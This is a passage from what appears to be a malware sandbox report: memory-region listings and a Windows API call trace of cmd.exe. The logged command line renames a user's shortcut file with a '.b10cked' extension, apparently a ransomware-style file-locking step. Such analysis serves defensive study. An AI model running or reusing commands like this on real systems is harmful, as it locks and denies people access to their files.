"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31778 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31779 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31780 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 31781 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31902 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31903 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31904 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31905 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31906 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 31907 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31908 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31909 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31910 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31911 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31912 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31913 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31914 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31915 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31916 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 31917 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31918 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31919 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31920 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31921 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31922 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31923 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 31924 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 31925 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 738 os_tid = 0xc94 [0215.457] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc2c | out: lpSystemTimeAsFileTime=0x2efc2c*(dwLowDateTime=0xb5388d60, dwHighDateTime=0x1d440a9)) [0215.457] GetCurrentProcessId () returned 0xb64 [0215.457] GetCurrentThreadId () returned 0xc94 [0215.457] GetTickCount () returned 0x3c4e3 [0215.457] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc24 | out: lpPerformanceCount=0x2efc24*=27224625907) returned 1 [0215.458] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.458] __set_app_type (_Type=0x1) [0215.458] __p__fmode () returned 0x76b331f4 [0215.458] __p__commode () returned 0x76b331fc [0215.458] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.458] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.458] GetCurrentThreadId () returned 0xc94 [0215.458] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc94) returned 0x38 [0215.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.458] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.458] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.458] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efbbc | out: phkResult=0x2efbbc*=0x0) returned 0x2 [0215.458] VirtualQuery (in: lpAddress=0x2efbf3, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.458] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.458] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.458] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.458] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.459] GetConsoleOutputCP () returned 0x1b5 [0215.459] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.459] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.459] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.459] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.459] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.459] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.459] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.460] GetEnvironmentStringsW () returned 0x440198* [0215.460] FreeEnvironmentStringsW (penv=0x440198) returned 1 [0215.460] GetEnvironmentStringsW () returned 0x440198* [0215.460] FreeEnvironmentStringsW (penv=0x440198) returned 1 [0215.460] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb2c | out: phkResult=0x2eeb2c*=0x40) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0xc0, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x1, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x1, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x0, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x40, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x40, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x40, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegCloseKey (hKey=0x40) returned 0x0 [0215.460] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb2c | out: phkResult=0x2eeb2c*=0x40) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x40, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x1, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x1, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x0, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x9, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.461] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x9, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.461] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x9, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.461] RegCloseKey (hKey=0x40) returned 0x0 [0215.461] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.461] srand (_Seed=0x5b8863b1) [0215.461] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"" [0215.461] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"" [0215.461] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.461] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4418f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.461] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.461] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.461] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.461] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.461] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.461] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.461] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.461] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.461] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.461] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.461] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.462] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.462] GetEnvironmentStringsW () returned 0x4422e8* [0215.462] FreeEnvironmentStringsW (penv=0x4422e8) returned 1 [0215.462] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.462] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.462] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.462] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.462] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.462] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.462] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.462] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.462] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.462] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.462] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef8f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef8f8, lpFilePart=0x2ef8f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef8f4*="Desktop") returned 0x18 [0215.462] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.462] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef674 | out: lpFindFileData=0x2ef674) returned 0x440028 [0215.462] FindClose (in: hFindFile=0x440028 | out: hFindFile=0x440028) returned 1 [0215.462] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef674 | out: lpFindFileData=0x2ef674) returned 0x440028 [0215.463] FindClose (in: hFindFile=0x440028 | out: hFindFile=0x440028) returned 1 [0215.463] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef674 | out: lpFindFileData=0x2ef674) returned 0x440028 [0215.463] FindClose (in: hFindFile=0x440028 | out: hFindFile=0x440028) returned 1 [0215.463] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.463] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.463] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.463] GetEnvironmentStringsW () returned 0x442b08* [0215.463] FreeEnvironmentStringsW (penv=0x442b08) returned 1 [0215.463] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.463] GetConsoleOutputCP () returned 0x1b5 [0215.464] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.464] GetUserDefaultLCID () returned 0x409 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efa38, cchData=128 | out: lpLCData="0") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efa38, cchData=128 | out: lpLCData="0") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efa38, cchData=128 | out: lpLCData="1") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.465] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.465] GetConsoleTitleW (in: lpConsoleTitle=0x4308f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.465] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.465] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.465] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.466] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.466] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.466] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.466] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.466] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.466] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.466] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.466] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.469] GetConsoleTitleW (in: lpConsoleTitle=0x2ef730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.469] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.469] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.469] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.469] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.469] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.469] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.469] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.469] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.469] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.469] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.469] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.469] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.469] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.469] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.469] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.469] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.469] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.469] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.469] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.469] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.469] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.469] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.470] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.470] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.470] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.470] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.470] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.470] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.470] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.470] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.470] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.470] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.470] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.470] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.470] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.471] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef4ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef4e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef4e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.471] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.471] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.472] _wcsnicmp 